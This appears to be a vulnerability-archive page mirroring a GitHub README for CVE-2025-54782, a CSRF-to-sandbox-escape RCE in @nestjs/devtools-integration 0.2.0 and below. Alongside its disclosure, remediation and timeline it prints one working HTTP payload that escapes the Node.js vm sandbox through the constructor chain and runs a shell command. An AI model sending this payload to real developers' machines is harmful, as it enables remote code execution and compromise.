Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2025-54782 PoC — @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers

Source
https://github.com/nitrixog/CVE-2025-54782
Associated Vulnerability
Title:@nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers (CVE-2025-54782)
Description:Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.
Description
NestJS DevTools Unauthenticated RCE
Readme
# CVE-2025-54782: Critical Bug in NestJS DevTools

🚨 **Critical Security Issue** - CVSS Score: 9.4/10

## Discovery

A critical security vulnerability was discovered in NestJS DevTools that allows attackers to execute arbitrary code on developers' machines through malicious websites. This represents a significant security risk as it can lead to complete system compromise.

## The Problem

**Affected Package:** `@nestjs/devtools-integration` version 0.2.0 and below  
**What Goes Wrong:** The package creates a local development server with insufficient security controls  
**Who's At Risk:** Any developer using NestJS DevTools in their local environment  

### How The Attack Works

When you have NestJS DevTools running, it starts a local server (usually on port 3000). This server has an endpoint at `/inspector/graph/interact` that's supposed to help with debugging. But here's the problem:

1. **Missing Access Controls** - Cross-origin requests are permitted to the local development server
2. **Inadequate Sandboxing** - The JavaScript execution sandbox can be bypassed
3. **Privilege Escalation** - Successful sandbox escape grants full system access

### Real Attack Example

A malicious website could send this request to your local NestJS server:

```http
POST /inspector/graph/interact HTTP/1.1
Content-Type: text/plain

{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami')}})()"}
```

This payload demonstrates:
- Sandbox escape via exception handling and constructor manipulation
- Process object access through prototype chain exploitation
- Command execution via child_process module

## Security Impact

- **Remote Code Execution** - Complete system compromise potential
- **Silent Exploitation** - Attacks occur without user awareness
- **Low Attack Complexity** - Simple web interaction triggers exploitation
- **Developer Targeting** - Could facilitate supply chain attacks on development environments

## Remediation

**Immediate Action Required:** Update the package:

```bash
npm update @nestjs/devtools-integration
```

**Verify Installation:**
```bash
npm ls @nestjs/devtools-integration
```

Ensure you're running version **0.2.1 or later**.

## Timeline

- Found the vulnerability while testing NestJS DevTools
- Reported it to the NestJS team
- They fixed it in version 0.2.1
- CVE-2025-54782 was assigned
- Now sharing this publicly to help other developers stay safe

## Official References

- [Socket.dev Blog Post](https://socket.dev/blog/nestjs-rce-vuln)
- [NestJS Security Advisory](https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7)
- [Official CVE Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-54782)

---
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →